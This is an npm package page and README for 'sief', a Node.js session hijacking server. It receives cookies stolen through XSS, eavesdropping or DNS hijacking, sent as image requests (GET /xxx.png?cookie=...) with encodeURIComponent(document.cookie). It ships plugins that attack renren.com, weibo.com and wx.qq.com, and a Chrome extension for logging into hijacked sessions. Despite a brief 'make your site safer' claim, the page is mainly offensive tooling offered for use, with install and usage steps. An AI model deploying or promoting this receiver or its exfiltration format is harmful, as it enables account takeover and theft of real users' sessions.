sief

Session hijacking tool in Node.

Usage no npm install needed!

<script type="module">
  import sief from 'https://cdn.skypack.dev/sief';
</script>

README

sief

A server listening to cookie submission to hijack session, supporting writing plugins for site specific attacks.

sief = thief + safe

This is a project to hijack sessions, and also a project to make your site safer, depending on the way you use it.

Philosophy

  • Do NOT steal cookies, only accept cookies from everywhere(xss, network eavsdropping, dns hijacking…)
  • Focus on the exploitation of session hijacking.

Features

  • Request to an image to upload cookies stolen by xss/network eavsdropping/dns hijack/other.
  • Log persistence.
  • Prebuilt plugins to attack renren.com, weibo.com, wx.qq.com.
  • Write your own plugins to do other attacks you desired. Plugins are loaded/reloaded/unloaded when added/changed/removed automatically, no need to restart.
  • View real-time cookie submissions and login to those hijacked sessions directly in browser with Sief Chrome Extension.
  • Ignore cookie submissions if the same one is received before, during a specified period of time, to protect your server.

Install

  1. Install PhantomJS

  2. Install sief

    npm install sief -g

Usage

Server

Usage: sief [options] <plugin|dir ...>

Options:

  -h, --help                   output usage information
  -V, --version                output the version number
  -i, --ignore-time [seconds]  specify seconds during which same requests will be ignored [300]
  -p, --port [port]            specify the port sief server listening to [3000]
  -l, --log-level [level]      set log level [INFO]

Submit cookies

GET /xxx.png?cookie=#cookies#&referer=#referer#&domain=#domani#

Parameters:

  • cookies - Required. Encode cookies first, for example, encodeURIComponent(document.cookies)
  • referer - If the attack is an xss exploit, referer will be retrieved from headers.referer directly, otherwise, specifiy it in query string.
  • domain - Domain is calculated from referer, defaults to main domain, for example qq.com. IF you want to fire a attack to its subdomain(wx.qq.com), specify it in query string.